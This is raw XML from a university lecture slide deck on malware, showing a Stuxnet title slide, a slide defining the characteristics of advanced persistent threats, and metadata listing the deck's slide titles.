              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319959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8415" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Characteristics of APT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Advanced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Used by the attackers of a wide variety of intrusion technologies and malware including the development of custom malware if required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The individual components may not necessarily be technically advanced but are carefully selected to suit the chosen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Persistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Determined application of the attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>over an extended period </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>against the chosen target in order to maximize the chance of success</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>A variety of attacks may be progressively applied until the target is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Threat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Threats to the selected targets as a result of the organized, capable, and well-funded attackers intent to compromise the specifically chosen targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The active involvement of people in the process greatly raises the threat level from that due to automated attacks tools, and also the likelihood of successful attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265517074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7262</TotalTime>
  <Words>2699</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>223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Design</vt:lpstr>
      <vt:lpstr>Malicious Software (Malware)</vt:lpstr>
      <vt:lpstr>Malware</vt:lpstr>
      <vt:lpstr>Classification of Malware</vt:lpstr>
      <vt:lpstr>Propagation Mechanisms</vt:lpstr>
      <vt:lpstr>Payload Actions</vt:lpstr>
      <vt:lpstr>Attack Kits</vt:lpstr>
      <vt:lpstr>Attack Sources</vt:lpstr>
      <vt:lpstr>Advanced Persistent Threats (APTs)</vt:lpstr>
      <vt:lpstr>Characteristics of APT</vt:lpstr>
      <vt:lpstr>APT Attacks</vt:lpstr>
      <vt:lpstr>Viruses</vt:lpstr>
      <vt:lpstr>Virus Components</vt:lpstr>
      <vt:lpstr>Lifetime of Virus</vt:lpstr>
      <vt:lpstr>Virus Logic</vt:lpstr>
      <vt:lpstr>Viruses</vt:lpstr>
      <vt:lpstr>Viruses</vt:lpstr>
      <vt:lpstr>Viruses</vt:lpstr>
      <vt:lpstr>Viruses</vt:lpstr>
      <vt:lpstr>Virus in Python (1)</vt:lpstr>
      <vt:lpstr>Virus in Python (2)</vt:lpstr>
      <vt:lpstr>Worms</vt:lpstr>
      <vt:lpstr>Mechanisms of Worms</vt:lpstr>
      <vt:lpstr>Damages by Worms</vt:lpstr>
      <vt:lpstr>Worm in Python</vt:lpstr>
      <vt:lpstr>Worm in Python</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>UD CIS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Unix System Overview</dc:title>
  <dc:creator>CHien-Chung Shen</dc:creator>
  <cp:lastModifiedBy>Chien-Chung Shen</cp:lastModifiedBy>
  <cp:revision>133</cp:revision>
  <cp:lastPrinted>2014-10-09T12:08:36Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-06-22T13:42:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-03-15T04:15:44Z</dcterms:modified>
</cp:coreProperties>
</file>